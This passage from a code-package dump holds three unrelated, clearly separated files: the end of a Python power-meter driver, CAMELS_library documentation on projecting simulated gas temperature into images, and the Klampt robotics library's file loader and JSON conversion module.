err_string = "No valid power readings were taken over the maximum allowed number of attempts `max_attempts`."
err_string += " The power meter is likely saturated."
raise Exception(err_string)
def set_slow_filter(self):
"""Set the averaging filter to slow mode
The slow filter uses a 16-measurement running average.
"""
self.write('F1')
def set_medium_filter(self):
"""Set the averaging filter to medium mode
The medium filter uses a 4-measurement running average.
"""
self.write('F2')
def set_no_filter(self):
"""Set the averaging filter to fast mode, i.e. no averaging"""
self.write('F3')
def get_filter(self):
"""Get the current setting for the averaging filter
Returns
-------
SLOW_FILTER, MEDIUM_FILTER, NO_FILTER
the current averaging filter
"""
val = self.query("F?")
return int(val)
def enable_hold(self, enable=True):
"""Enable hold mode"""
self.write('G{}', int(not enable))
def disable_hold(self):
"""Disable hold mode"""
self.enable_hold(False)
def hold_enabled(self):
"""Whether hold mode is enabled
Returns
-------
enabled : bool
True if in hold mode, False if in run mode
"""
val = int(self.query('G?'))
return (val == 0)
def is_measurement_valid(self):
"""Whether the current measurement is valid
The measurement is considered invalid if the power meter is saturated,
over-range or busy.
"""
reg = self.get_status_byte()
is_saturated = bool(reg & self._SATURATED)
is_over_range = bool(reg & self._OUT_OF_RANGE)
is_busy = bool(reg & self._BUSY)
return not (is_saturated or is_over_range or is_busy)
def store_reference(self):
"""Store the current power input as a reference
Sets the current power measurement as the reference power for future dB
or relative measurements.
"""
self.write('S')
def enable_zero(self, enable=True):
"""Enable the zero function
When enabled, the next power reading is stored as a background value
and is subtracted off of all subsequent power readings.
"""
self.write("Z{}", int(enable))
def disable_zero(self):
"""Disable the zero function"""
self.enable_zero(False)
def zero_enabled(self):
"""Whether the zero function is enabled"""
val = int(self.query('Z?')) # Need to cast to int first
return bool(val)
def set_units(self, units):
"""Set the units for displaying power measurements
The different unit modes are watts, dB, dBm, and REL. Each displays
the power in a different way.
'watts' displays absolute power in watts
'dBm' displays power in dBm (i.e. dBm = 10 * log(P / 1mW))
'dB' displays power in dB relative to the current reference power (i.e.
dB = 10 * log(P / Pref). At power-up, the reference power is set to
1mW.
'REL' displays power relative to the current reference power (i.e.
REL = P / Pref)
The current reference power can be set using `store_reference()`.
Parameters
----------
units : 'watts', 'dBm', 'dB', or 'REL'
Case-insensitive str indicating which units mode to enter.
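
        Example
        -------
        A sketch, assuming ``meter`` is an open instance. In 'dB' mode a
        reading near -3.0 means roughly half the reference power, since
        10 * log10(0.5) is about -3.01::

            meter.set_units('dB')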
"""
units = units.lower()
valid_units = {'watts': 1, 'dbm': 2, 'db': 3, 'rel': 4}
if units not in valid_units:
            raise Exception("`units` must be one of 'watts', 'dbm', 'db', or 'rel'")
self.write('U{}', valid_units[units])
def get_units(self):
"""Get the units used for displaying power measurements
Returns
-------
units : str
'watts', 'db', 'dbm', or 'rel'
"""
val = int(self.query('U?'))
        units = {1: 'watts', 2: 'dbm', 3: 'db', 4: 'rel'}
return units[val]
@property
def local_lockout(self):
"""Whether local-lockout is enabled"""
        return bool(int(self.query('L?')))
@local_lockout.setter
def local_lockout(self, enable):
self.write("L{}", int(enable)) | PypiClean |
/CAMELS_library-0.3.tar.gz/CAMELS_library-0.3/docs/source/images.rst | ******
Images
******
There are two different ways to create images from the simulations:
Column density
--------------
The first option is to create images by computing the column density along the line of sight through the center of each pixel. The next script computes the mass-weighted gas temperature as
.. math::
\bar{T}(x,y) = \frac{\int m(x,y,z)T(x,y,z) dz}{\int m(x,y,z)dz}
where :math:`m(x,y,z)` and :math:`T(x,y,z)` are the gas mass and temperature at position :math:`(x,y,z)`.
.. code-block:: python
import numpy as np
import MAS_library as MASL
import camels_library as CL
import h5py
##################################### INPUT ######################################
# input and output files
snapshot = '/mnt/ceph/users/camels/Sims/IllustrisTNG/LH_0/snap_033.hdf5'
f_out = 'gas_temperature.npy'
    # region over which to make the image (should be square)
x_min, x_max = 0.0, 25.0 #Mpc/h
y_min, y_max = 0.0, 25.0 #Mpc/h
z_min, z_max = 0.0, 5.0 #Mpc/h
grid = 250 #image will have grid x grid pixels
# parameters to compute column density
plane = 'XY' #plane to project the region: 'XY', 'YZ', 'XZ'
periodic = True #whether treat image as periodic in the considered plane
# KDTree parameters
k = 32 #number of neighborghs
threads = -1
##################################################################################
# read gas position and masses
f = h5py.File(snapshot, 'r')
BoxSize = f['Header'].attrs[u'BoxSize']/1e3 #Mpc/h
redshift = f['Header'].attrs[u'Redshift']
pos_g = f['PartType0/Coordinates'][:]/1e3 #Mpc/h
pos_g = pos_g.astype(np.float32) #positions as float32
Mg = f['PartType0/Masses'][:]*1e10 #Msun/h
f.close()
T = CL.temperature(snapshot) #K
Rg = CL.KDTree_distance(pos_g, pos_g, k, BoxSize*(1.0+1e-8), threads, verbose=False) #Mpc/h
Rg = Rg.astype(np.float32) #radii as float32
# select the particles in the considered region
indexes = np.where((pos_g[:,0]>x_min) & (pos_g[:,0]<x_max) &
(pos_g[:,1]>y_min) & (pos_g[:,1]<y_max) &
(pos_g[:,2]>z_min) & (pos_g[:,2]<z_max))[0]
pos_g_ = pos_g[indexes]
T_ = T[indexes]
Mg_ = Mg[indexes]
Rg_ = Rg[indexes]
if plane=='XY': axis_x, axis_y, width = 0, 1, x_max-x_min
elif plane=='YZ': axis_x, axis_y, width = 1, 2, y_max-y_min
elif plane=='XZ': axis_x, axis_y, width = 0, 2, z_max-z_min
# project gas mass*temperatures into a 2D map
TM = np.zeros((grid,grid), dtype=np.float64)
MASL.voronoi_RT_2D(TM, pos_g_, T_*Mg_, Rg_, x_min, y_min,
axis_x, axis_y, width, periodic, verbose=True)
# project gas mass into a 2D map
M = np.zeros((grid,grid), dtype=np.float64)
MASL.voronoi_RT_2D(M, pos_g_, Mg_, Rg_, x_min, y_min,
axis_x, axis_y, width, periodic, verbose=True)
# compute mean temperature
T = TM/M
print('%.3e < T < %.3e'%(np.min(T), np.max(T)))
# save image to file
np.save(f_out, T)
The image can be plotted with something like this:
.. code-block:: python
import numpy as np
from pylab import *
from matplotlib.colors import LogNorm
image = np.load('gas_temperature.npy')
f_out = 'gas_temperature.png'
fig = figure()
ax1 = fig.add_subplot(111)
ax1.imshow(image.T, cmap=get_cmap('binary_r'), origin='lower', interpolation='bicubic',
extent=[0,25,0,25], norm = LogNorm(vmin=2e3,vmax=1e7))
savefig(f_out, bbox_inches='tight')
close(fig)
Producing this image:
.. image:: gas_temperature.png
:align: center
The most important choice is the radius assigned to each gas particle. There are multiple possibilities:

- For IllustrisTNG, each gas particle can be approximated as a sphere with the same volume as its Voronoi cell, i.e., :math:`R=(3M/(4\pi\rho))^{1/3}` (see the sketch below).
- The above radius can be multiplied by an overall factor to avoid empty regions.
- The radius can be taken as the distance to the k-th nearest gas particle.
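
For reference, the first definition can be computed directly from the snapshot. The sketch below is only illustrative: it assumes the gas density is stored in ``PartType0/Density`` in units consistent with the masses and comoving positions (check the units of your snapshot):

.. code-block:: python

    import numpy as np
    import h5py

    f   = h5py.File(snapshot, 'r')
    Mg  = f['PartType0/Masses'][:]*1e10   #Msun/h
    rho = f['PartType0/Density'][:]*1e10  #Msun/h/(ckpc/h)^3
    f.close()

    # Voronoi-equivalent radius: R = (3M/(4*pi*rho))^(1/3)
    Rg = (3.0*Mg/(4.0*np.pi*rho))**(1.0/3.0)/1e3  #Mpc/h
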
The image below shows how the different definitions lead to different results:
.. image:: gas_temperature_zoom.png
We recommend using, as the radius of a gas particle, the distance to its 32nd nearest gas particle.
3D fields slices
----------------
| PypiClean |
/Klampt-0.9.0-cp36-cp36m-win_amd64.whl/klampt/io/loader.py | from ..robotsim import *
from ..math import so3,vectorops
from ..model.contact import ContactPoint, Hold
from ..model.trajectory import Trajectory,HermiteTrajectory,SO3Trajectory,SE3Trajectory
from ..model import types
import os
import warnings
EXTENSION_TO_TYPES = {'.config':['Config'],
'.configs':['Configs'],
'.tri':['Geometry3D','TriangleMesh'],
'.off':['Geometry3D','TriangleMesh'],
'.stl':['Geometry3D','TriangleMesh'],
'.ply':['Geometry3D','TriangleMesh'],
'.wrl':['Geometry3D','TriangleMesh'],
'.dae':['Geometry3D','TriangleMesh'],
'.poly':['Geometry3D','TriangleMesh'],
'.geom':['Geometry3D','GeometricPrimitive'],
'.pcd':['Geometry3D','PointCloud'],
'.vector3':['Vector3'],
'.matrix3':['Matrix3'],
'.ikgoal':['IKGoal'],
'.xform':['RigidTransform'],
'.path':['Trajectory','LinearPath','SE3Trajectory','SO3Trajectory'],
'.hold':['Hold'],
'.stance':['Stance'],
'.grasp':['Grasp'],
'.rob':['RobotModel'],
'.urdf':['RobotModel'],
'.obj':['Geometry3D','RigidObjectModel','TriangleMesh'],
'.env':['TerrainModel'],
'.xml':['WorldModel','MultiPath']
}
"""dict mapping file extensions to lists of compatible Klampt types."""
UNSUPPORTED_JSON_TYPES = ['Geometry3D','TriangleMesh','PointCloud','GeometricPrimitive','VolumeGrid',
'RobotModel','RigidObjectModel','TerrainModel','WorldModel']
"""List of Klampt types that cannot currently be exported to JSON"""
TYPE_TO_EXTENSIONS = dict()
"""dict mapping Klamp't types to lists of compatible file extensions."""
for (k,v) in list(EXTENSION_TO_TYPES.items()):
for t in v:
if t in TYPE_TO_EXTENSIONS:
TYPE_TO_EXTENSIONS[t].append(k)
else:
TYPE_TO_EXTENSIONS[t] = [k]
def filename_to_types(name):
"""Returns the Klampt types possibly represented by the given filename's
extension.
"""
fileName, fileExtension = os.path.splitext(name)
fileExtension = fileExtension.lower()
if fileExtension in EXTENSION_TO_TYPES:
return EXTENSION_TO_TYPES[fileExtension]
else:
raise RuntimeError("Cannot determine type of object from filename "+name)
def filename_to_type(name):
"""Returns one Klampt type represented by the given filename's
extension.
If the file is a dynamic type (.xml or .json), just 'xml' or 'json' is
returned because the type will need to be determined after parsing the
file.
If the type is ambiguous (like .obj), the first type in EXTENSION_TO_TYPES
is returned.
Returns:
str: The Klamp't type
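
    Example::

        filename_to_type('robot.rob')   # 'RobotModel'
        filename_to_type('scene.xml')   # 'xml' (resolved after parsing)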
"""
fileName, fileExtension = os.path.splitext(name)
fileExtension = fileExtension.lower()
if fileExtension == '.xml':
return 'xml' #dynamic loading
elif fileExtension == '.json':
return 'json' #dynamic loading
elif fileExtension in EXTENSION_TO_TYPES:
ftypes = EXTENSION_TO_TYPES[fileExtension]
if len(ftypes) > 1 and fileExtension not in ['.path'] and (ftypes[0] != 'Geometry3D' and len(ftypes) > 2):
warnings.warn("loader.filename_to_type(): filename {} is ambiguous, matches types {}".format(name,', '.join(ftypes)))
return ftypes[0]
else:
raise RuntimeError("Cannot determine type of object from filename "+name)
def write_Vector(q):
"""Writes a vector to a string in the length-prepended format 'n v1 ... vn'"""
return str(len(q))+'\t'+' '.join(str(v) for v in q)
def read_Vector(text):
"""Reads a length-prepended vector from a string 'n v1 ... vn'"""
items = text.split()
if len(items) == 0:
raise ValueError("Empty text")
if int(items[0])+1 != len(items):
raise ValueError("Invalid number of items")
return [float(v) for v in items[1:]]
def write_Vector_raw(x):
"""Writes a vector to a string in the raw format 'v1 ... vn'"""
return ' '.join(str(xi) for xi in x)
def read_Vector_raw(text):
"""Reads a vector from a raw string 'v1 ... vn'"""
items = text.split()
return [float(v) for v in items]
def write_VectorList(x):
"""Writes a list of vectors to string"""
return '\n'.join(write_Vector(xi) for xi in x)
def read_VectorList(text):
"""Reads a list of endline-separated vectors from a string"""
items = text.split()
vectors = []
pos = 0
while pos < len(items):
n = int(items[pos])
vectors.append([float(v) for v in items[pos+1:pos+1+n]])
pos += 1+n
return vectors
def write_Matrix(x):
"""Writes a matrix to a string in the format
m n
x11 x12 ... x1n
...
xm1 xm2 ... xmn
"""
return '\n'.join([str(len(x))+' '+str(len(x[0]))]+[write_Vector_raw(xi) for xi in x])
def read_Matrix(text):
"""Reads a matrix from a string in the format
m n
x11 x12 ... x1n
...
xm1 xm2 ... xmn
"""
items = text.split()
if len(items) < 2: raise ValueError("Invalid matrix string")
m,n = int(items[0]),int(items[1])
if len(items) != 2 + m*n:
raise ValueError("Invalid number of matrix elements, should be %d, instead got %d"%(m*n,len(items)-2))
k = 2
x = []
for i in range(m):
x.append([float(v) for v in items[k:k+n]])
k += n
return x
def write_so3(x):
"""Writes an so3 element, i.e., rotation matrix, to string in the same
format as written to by Klampt C++ bindings (row major)."""
assert len(x)==9,"Argument must be an so3 element"
return '\t'.join([' '.join([str(mij) for mij in mi ]) for mi in so3.matrix(x)])
def read_so3(text):
"""Reads an so3 element, i.e., rotation matrix, from string in the same
format as written to by Klampt C++ bindings (row major)."""
items = text.split()
if len(items) != 9: raise ValueError("Invalid element of SO3, must have 9 elements")
return so3.inv([float(v) for v in items])
def write_se3(x):
"""Writes an se3 element, i.e., rigid transformation, to string in the
same format as written to by Klampt C++ bindings (row major R, followed by
t)."""
return write_so3(x[0])+'\t'+write_Vector_raw(x[1])
def read_se3(text):
"""Reads an se3 element, i.e., rigid transformation, to string in the
same format as written to by Klampt C++ bindings (row major R, followed by
t)."""
items = text.split()
if len(items) != 12: raise ValueError("Invalid element of SE3, must have 12 elements")
return (so3.inv([float(v) for v in items[:9]]),[float(v) for v in items[9:]])
def write_Matrix3(x):
"""Writes a 3x3 matrix to a string"""
return write_so3(so3.from_matrix(x))
def read_Matrix3(text):
"""Reads a 3x3 matrix from a string"""
return so3.matrix(read_so3(text))
def read_ContactPoint(text):
"""Reads a contact point from a string 'x1 x2 x3 n1 n2 n3 kFriction'"""
items = text.split()
if len(items)!=7:
raise ValueError("Invalid number of items, should be 7")
return ContactPoint([float(v) for v in items[0:3]],[float(v) for v in items[3:6]],float(items[6]))
def write_ContactPoint(cp):
"""Writes a contact point to a string 'x1 x2 x3 n1 n2 n3 kFriction'"""
return ' '.join([str(v) for v in list(cp.x)+list(cp.n)+[cp.kFriction]])
def read_IKObjective(text):
"""Reads an IKObjective from a string in the Klamp't native format
``link destLink posConstraintType [pos constraint items] ...
rotConstraintType [rot constraint items]``
where link and destLink are integers, posConstraintType is one of
* N: no constraint
* P: position constrained to a plane
* L: position constrained to a line
* F: position constrained to a point
and rotConstraintType is one of
* N: no constraint
* T: two-axis constraint (not supported)
* A: rotation constrained about axis
* F: fixed rotation
The [pos constraint items] contain a variable number of whitespace-
separated items, dependending on posConstraintType:
* N: 0 items
* P: the local position xl yl zl, world position x y z on the plane, and
plane normal nx,ny,nz
* L: the local position xl yl zl, world position x y z on the line, and
line axis direction nx,ny,nz
* F: the local position xl yl zl and world position x y z
The [rot constraint items] contain a variable number of whitespace-
separated items, dependending on rotConstraintType:
* N: 0 items
* T: not supported
* A: the local axis xl yl zl and the world axis x y z
* F: the world rotation matrix, in moment (aka exponential map) form
mx my mz (see so3.from_moment())
"""
items = text.split()
if len(items) < 4:
raise ValueError("Not enough items to unpack")
link = int(items[0])
destlink = int(items[1])
ind = 2
posType = None
posLocal = None
posWorld = None
posDirection = None
rotType = None
rotWorld = None
rotAxis = None
#read pos constraint
posType = items[ind]
ind += 1
if posType=='N':
#no constraint
pass
elif posType=='P' or posType=='L':
posLocal = items[ind:ind+3]
ind += 3
posWorld = items[ind:ind+3]
ind += 3
posDirection = items[ind:ind+3]
ind += 3
elif posType=='F':
posLocal = items[ind:ind+3]
ind += 3
posWorld = items[ind:ind+3]
ind += 3
else:
raise ValueError("Invalid pos type "+posType+", must be N,P,L or F")
rotType = items[ind]
ind += 1
if rotType=='N':
#no constraint
pass
elif rotType=='T' or rotType=='A':
rotAxis = items[ind:ind+3]
ind += 3
rotWorld = items[ind:ind+3]
ind += 3
elif rotType=='F':
rotWorld = items[ind:ind+3]
ind += 3
else:
raise ValueError("Invalid rot type "+rotType+", must be N,T,A or F")
if posLocal: posLocal = [float(v) for v in posLocal]
if posWorld: posWorld = [float(v) for v in posWorld]
if posDirection: posDirection = [float(v) for v in posDirection]
if rotAxis: rotAxis = [float(v) for v in rotAxis]
if rotWorld: rotWorld = [float(v) for v in rotWorld]
obj = IKObjective()
obj.setLinks(link,destlink);
if posType=='N':
obj.setFreePosConstraint()
elif posType=='F':
obj.setFixedPosConstraint(posLocal,posWorld)
elif posType=='P':
obj.setPlanePosConstraint(posLocal,posDirection,vectorops.dot(posDirection,posWorld))
else:
obj.setLinearPosConstraint(posLocal,posWorld,posDirection)
if rotType == 'N':
obj.setFreeRotConstraint()
elif rotType == 'F':
#fixed constraint
R = so3.from_moment(rotWorld)
obj.setFixedRotConstraint(R)
elif rotType == 'A':
obj.setAxialRotConstraint(rotAxis,rotWorld)
else:
raise NotImplementedError("Two-axis rotational constraints not supported")
return obj
def write_IKObjective(obj):
return obj.saveString()
def read_Hold(text):
"""Loads a Hold from a string"""
lines = parse_lines(text)
if lines[0] != 'begin hold':
raise ValueError('Invalid hold begin text')
if lines[-1] != 'end':
raise ValueError('Invalid hold end text')
h = Hold()
posLocal = None
posWorld = None
localPos0 = None
rotAxis = None
rotWorld = None
iktype = 0
for l in lines[1:-1]:
items = l.split()
if items[1] != '=':
raise ValueError("Invalid line format")
if items[0] == 'link':
h.link = int(items[2])
elif items[0] == 'contacts':
ind = 2
while ind < len(items):
h.contacts.append(read_ContactPoint(' '.join(items[ind:ind+7])))
ind += 7
elif items[0] == "position":
posLocal = [float(v) for v in items[2:5]]
posWorld = [float(v) for v in items[5:8]]
elif items[0] == "axis":
rotAxis = [float(v) for v in items[2:5]]
rotWorld = [float(v) for v in items[5:8]]
elif items[0] == "rotation":
rotWorld = [float(v) for v in items[2:5]]
elif items[0] == "ikparams":
localPos0 = [float(v) for v in items[2:5]]
rotWorld = [float(v) for v in items[5:8]]
iktype = 1
else:
raise ValueError("Invalid item "+items[0])
if iktype == 0:
h.ikConstraint = IKObjective()
        if posLocal is None:
            raise ValueError("Hold must have some point constraint")
        if rotWorld is None:
            h.ikConstraint.setFixedPoint(h.link,posLocal,posWorld)
        elif rotAxis is None:
R = so3.from_moment(rotWorld)
t = vectorops.sub(posWorld,so3.apply(R,posLocal))
h.ikConstraint.setFixedTransform(h.link,R,t)
else:
raise NotImplementedError("Can't do axis rotation yet")
            # unreachable until axis rotation is implemented:
            # h.ikConstraint.setAxisRotation(h.link,posLocal,posWorld,localAxis,worldAxis)
else:
raise NotImplementedError("other ik specifications not done yet")
        # unreachable until other ik specifications are implemented:
        # h.setupIKConstraint(localPos0,rotWorld)
return h
def write_Hold(h):
"""Writes a Hold to a string"""
text = "begin hold\n"
text += " link = "+str(h.link)+"\n"
text += " contacts = ";
text += " \\\n ".join([write_ContactPoint(c) for c in h.contacts])
text += "\n"
localPos, worldPos = h.ikConstraint.getPosition()
text += " position = "+" ".join(str(v) for v in localPos)+" \\\n"
text += " "+" ".join(str(v) for v in worldPos)+"\n"
#TODO: write ik constraint rotation
if h.ikConstraint.numRotDims()==3:
#fixed rotation
m = so3.moment(h.ikConstraint.getRotation())
text += "rotation = "+" ".join(str(v) for v in m)+"\n"
elif h.ikConstraint.numRotDims()==1:
locAxis,worldAxis = h.ikConstraint.getRotationAxis()
text += "axis = "+" ".join(str(v) for v in locAxis)+" \\\n"
text += " "+" ".join(str(v) for v in worldAxis)+"\n"
text += "end"
return text
def write_GeometricPrimitive(g):
return g.saveString()
def read_GeometricPrimitive(text):
g = GeometricPrimitive()
if not g.loadString(text):
raise RuntimeError("Error reading GeometricPrimitive from string")
return g
def read_IntArray(text):
"""Reads a length-prepended vector from a string 'n v1 ... vn'"""
items = text.split()
if int(items[0])+1 != len(items):
raise ValueError("Invalid number of items")
return [int(v) for v in items[1:]]
def read_StringArray(text):
"""Reads a length-prepended vector from a string 'n v1 ... vn'"""
items = text.split()
if int(items[0])+1 != len(items):
raise ValueError("Invalid number of items")
return items[1:]
def parse_lines(text):
"""Returns a list of lines from the given text. Understands end-of-line escapes '\\n'"""
lines = text.strip().split('\n')
esclines = []
esc = False
for l in lines:
if esc:
esclines[-1] = esclines[-1]+l
else:
esclines.append(l)
if len(l)>0 and l[-1]=='\\':
esclines[-1] = esclines[-1][:-1]
esc = True
else:
esc = False
return esclines
readers = {'Config':read_Vector,
'Vector':read_Vector,
'Configs':read_VectorList,
'Vector3':read_Vector_raw,
'Matrix':read_Matrix,
'Matrix3':read_Matrix3,
'Rotation':read_so3,
'RigidTransform':read_se3,
'IKObjective':read_IKObjective,
'IKGoal':read_IKObjective,
'Hold':read_Hold,
'GeometricPrimitive':read_GeometricPrimitive,
'IntArray':read_IntArray,
'StringArray':read_StringArray,
}
writers = {'Config':write_Vector,
'Vector':write_Vector,
'Configs':write_VectorList,
'Vector3':write_Vector_raw,
'Matrix':write_Matrix,
'Matrix3':write_Matrix3,
'Rotation':write_so3,
'RigidTransform':write_se3,
'IKObjective':write_IKObjective,
'IKGoal':write_IKObjective,
'Hold':write_Hold,
'GeometricPrimitive':write_GeometricPrimitive,
'IntArray':write_Vector,
'StringArray':write_Vector,
}
def write(obj,type):
"""General-purpose write of an arbitrary Klampt object to a str.
Args:
obj: A Klampt object
type (str): Either the Klamp't type, 'json', or 'auto'. If 'auto', the
type will be auto-detected from the object.
Returns:
str: The encoding of the object.
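
    Example (using the Config writer)::

        s = write([1.0, 2.0, 3.0], 'Config')   # "3\t1.0 2.0 3.0"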
"""
global writers
if type == 'auto':
type = types.object_to_type(obj,writers)
if type is None:
raise ValueError("Can't determine a writable type for object of type "+obj.__class__.__name__)
elif type == 'json':
import json
return json.dumps(to_json(obj))
if type not in writers:
raise ValueError("Writing of objects of type "+type+" not supported")
return writers[type](obj)
def read(type,text):
"""General-purpose read of an arbitrary Klampt object from a str.
Args:
type (str): Either the Klamp't type, or 'json'. Future versions may
support 'xml' but this is not supported right now. 'auto' may
not be specified.
text (str): A string containing the object data.
Returns:
Klamp't object
"""
global readers
if type == 'json':
import json
jsonobj = json.loads(text)
return from_json(jsonobj)
if type not in readers:
raise ValueError("Reading of objects of type "+type+" not supported")
return readers[type](text)
def load_WorldModel(fn):
w = WorldModel()
if not w.loadFile(fn):
raise IOError("Error reading WorldModel from "+fn)
return w
def load_Geometry3D(fn):
g = Geometry3D()
if not g.loadFile(fn):
raise IOError("Error reading Geometry3D from "+fn)
return g
def load_Trajectory(fn):
value = Trajectory()
value.load(fn)
return value
def load_MultiPath(fn):
from ..model import multipath
value = multipath.MultiPath()
value.load(fn)
return value
def load_dynamic_xml(fn):
#XML types may only be a WorldModel or MultiPath
value = WorldModel()
res = value.readFile(fn)
if res:
return value
    return load_MultiPath(fn)
loaders = {'Trajectory':load_Trajectory,
'LinearPath':load_Trajectory,
'MultiPath':load_MultiPath,
'Geometry3D':load_Geometry3D,
'WorldModel':load_WorldModel,
'xml':load_dynamic_xml
}
savers = {'Trajectory':lambda x,fn:x.save(fn),
'LinearPath':lambda x,fn:x.save(fn),
'MultiPath':lambda x,fn:x.save(fn),
'Geometry3D':lambda x,fn:x.save(fn),
'WorldModel':lambda x,fn:x.writeFile(fn),
}
def save(obj,type,fn):
"""General-purpose save of an arbitrary Klampt object to a file.
This also works with RobotModel, RigidObjectModel, and TerrainModel
(which don't work with load).
Args:
obj: a Klamp't object.
type (str): the Klampt type, 'json', or 'auto'
fn (str): a file name
Returns:
bool: True if successful.
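
    Example (illustrative, assuming ``traj`` is a Trajectory object; the
    .path extension is compatible with the Trajectory saver)::

        save(traj, 'auto', 'out.path')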
"""
global savers,writers
if hasattr(obj,'saveFile'):
return obj.saveFile(fn)
if type == 'auto':
savers_and_writers = list(savers.keys()) + list(writers.keys())
type = types.object_to_type(obj,savers_and_writers)
if type is None:
raise ValueError("Can't determine a savable type for object of type "+obj.__class__.__name__)
elif type == 'json':
import json
with open(fn,'w') as f:
json.dump(to_json(obj),f)
return True
if type in savers:
return savers[type](obj,fn)
elif type in writers:
with open(fn,'w') as f:
f.write(writers[type](obj)+'\n')
return True
else:
raise ValueError("Saving of type "+type+" is not supported")
def load(type,fn):
"""General-purpose load of an arbitrary Klampt object from a file
or URL.
An exception is raised if there is an error loading or
parsing the file. Possible exception types include IOError,
ValueError, and HTTPError.
Args:
type (str): a Klamp't type, 'json', or 'auto'
fn (str): a filename.
Returns:
Klamp't object
"""
if type == 'auto':
type = filename_to_type(fn)
global loaders,readers
cppurl = False
if type == 'WorldModel' or (type == 'Geometry3D' and fn.find('ros://') >= 0): #these two types handle URLs in C++ API
cppurl = True
if not cppurl and fn.find('://') >= 0:
import urllib.request, urllib.error, urllib.parse
src = None
data = None
try:
src = urllib.request.urlopen(fn)
data = src.read()
print("klampt.io.loader.load(): Download %s HTTP response code %s, size %d bytes"%(fn,src.getcode(),len(data)))
finally:
if src:
src.close()
if type in loaders:
#need to write to temporary file
import os
import tempfile
local_filename = None
fileName, suffix = os.path.splitext(fn)
with tempfile.NamedTemporaryFile(delete=False,suffix=suffix) as tmp_file:
local_filename = tmp_file.name
print("klampt.io.loader.load(): saving data to temp file",local_filename)
tmp_file.write(data)
tmp_file.flush()
res = loaders[type](local_filename)
os.remove(local_filename)
elif type in readers or type == 'json':
res = readers[type](data)
else:
raise ValueError("Loading of type "+type+" is not supported")
return res
if type in loaders:
return loaders[type](fn)
elif type in readers or type == 'json':
text = None
with open(fn,'r') as f:
text = ''.join(f.readlines())
return read(type,text)
else:
raise ValueError("Loading of type "+type+" is not supported")
def to_json(obj,type='auto'):
"""Converts from a Klamp't object to a JSON-compatible structure.
The resulting structure can be converted to a JSON string using
``json.dumps()`` in the Python builtin ``json`` module.
Not all objects are supported yet, notably geometry-related objects and
world entities.
Args:
obj: A Klamp't object.
        type (str, optional): the type of the object (see
            :mod:`~klampt.model.types`). If 'auto' (default), the type of the
object is inferred automatically.
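
    Example (a plain vector maps to itself and can then be serialized with
    the builtin ``json`` module)::

        import json
        s = json.dumps(to_json([1.0, 2.0, 3.0]))   # '[1.0, 2.0, 3.0]'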
"""
if type == 'auto':
if isinstance(obj,(list,tuple)):
if all([isinstance(v,(bool,int,float)) for v in obj]):
type = 'Vector'
else:
if len(obj)==2 and len(obj[0])==9 and len(obj[1])==3:
type = 'RigidTransform'
else:
isconfigs = True
for item in obj:
if not all([isinstance(v,(bool,int,float)) for v in item]):
isconfigs = False
if isconfigs:
type = 'Configs'
else:
raise TypeError("Could not parse object "+str(obj))
elif isinstance(obj,(bool,int,float,str)):
type = 'Value'
elif obj.__class__.__name__ in ['ContactPoint','IKObjective','Trajectory','MultiPath','GeometricPrimitive','TriangleMesh','ConvexHull','PointCloud','VolumeGrid','Geometry3D']:
type = obj.__class__.__name__
elif isinstance(obj,Trajectory): #some subclasses of Trajectory may be used here too
type = obj.__class__.__name__
else:
raise TypeError("Unknown object of type "+obj.__class__.__name__)
if type in ['Config','Configs','Vector','Matrix','Vector2','Vector3','Matrix3','Point','Rotation','Value','IntArray','StringArray']:
return obj
elif type == 'RigidTransform':
return obj
elif type == 'ContactPoint':
return {'x':obj.x,'n':obj.n,'kFriction':obj.kFriction}
elif type == 'Trajectory' or type == 'LinearPath':
return {'times':obj.times,'milestones':obj.milestones}
elif type.endswith('Trajectory'):
return {'type':type,'times':obj.times,'milestones':obj.milestones}
elif type == 'IKObjective' or type == 'IKGoal':
res = {'type':type,'link':obj.link()}
if obj.destLink() >= 0:
res['destLink'] = obj.destLink()
if obj.numPosDims()==3:
res['posConstraint']='fixed'
res['localPosition'],res['endPosition']=obj.getPosition()
elif obj.numPosDims()==2:
res['posConstraint']='linear'
res['localPosition'],res['endPosition']=obj.getPosition()
res['direction']=obj.getPositionDirection()
elif obj.numPosDims()==1:
res['posConstraint']='planar'
res['localPosition'],res['endPosition']=obj.getPosition()
res['direction']=obj.getPositionDirection()
else:
#less verbose to just eliminate this
#res['posConstraint']='free'
pass
if obj.numRotDims()==3:
res['rotConstraint']='fixed'
res['endRotation']=so3.moment(obj.getRotation())
elif obj.numRotDims()==2:
res['rotConstraint']='axis'
res['localAxis'],res['endRotation']=obj.getRotationAxis()
elif obj.numRotDims()==1:
raise NotImplementedError("twoaxis constraints are not implemented in Klampt")
else:
#less verbose to just eliminate this
#res['rotConstraint']='free'
pass
return res
elif type == 'TriangleMesh':
inds = list(obj.indices)
inds = [inds[i*3:i*3+3] for i in range(len(inds)//3)]
verts = list(obj.vertices)
verts = [verts[i*3:i*3+3] for i in range(len(verts)//3)]
return {'type':type,'indices':inds,'vertices':verts}
elif type == 'PointCloud':
verts = list(obj.vertices)
verts = [verts[i*3:i*3+3] for i in range(len(verts)//3)]
res = {'type':type,'vertices':verts}
propNames = list(obj.propertyNames)
if len(propNames) > 0:
res['propertyNames'] = propNames
if len(verts) * len(propNames) > 0:
n = len(verts)
k = len(propNames)
props = list(obj.properties)
props = [props[i*k:i*k+k] for i in range(n)]
res['properties'] = props
#TODO: settings
return res
elif type == 'VolumeGrid':
res = {'type':type}
res['bmin'] = [obj.bbox[i] for i in range(3)]
res['bmax'] = [obj.bbox[i] for i in range(3,6)]
res['dims'] = list(obj.dims)
res['values'] = list(obj.values)
return res
elif type == 'ConvexHull':
points = [[obj.points[i],obj.points[i+1],obj.points[i+2]] for i in range(0,len(obj.points),3)]
return {'type':type,'points':points}
elif type == 'Geometry3D':
data = None
gtype = obj.type()
if gtype == 'GeometricPrimitive':
data = to_json(obj.getGeometricPrimitive(),gtype)
elif gtype == 'TriangleMesh':
data = to_json(obj.getTriangleMesh(),gtype)
elif gtype == 'PointCloud':
data = to_json(obj.getPointCloud(),gtype)
elif gtype == 'ConvexHull':
data = to_json(obj.getConvexHull(),gtype)
elif gtype == 'VolumeGrid':
data = to_json(obj.getVolumeGrid(),gtype)
elif gtype == 'Group':
data = [to_json(obj.getElement(i)) for i in range(obj.numElements())]
return {'type':type,'datatype':gtype,'data':data}
elif type in writers:
return {'type':type,'data':write(obj,type)}
else:
raise ValueError("Unknown or unsupported type "+type)
def from_json(jsonobj,type='auto'):
"""Converts from a JSON structure to a Klamp't object of the appropriate
type.
Note: a JSON structure can be created from a JSON string using the
``json.loads()`` function in the Python builtin ``json`` module.
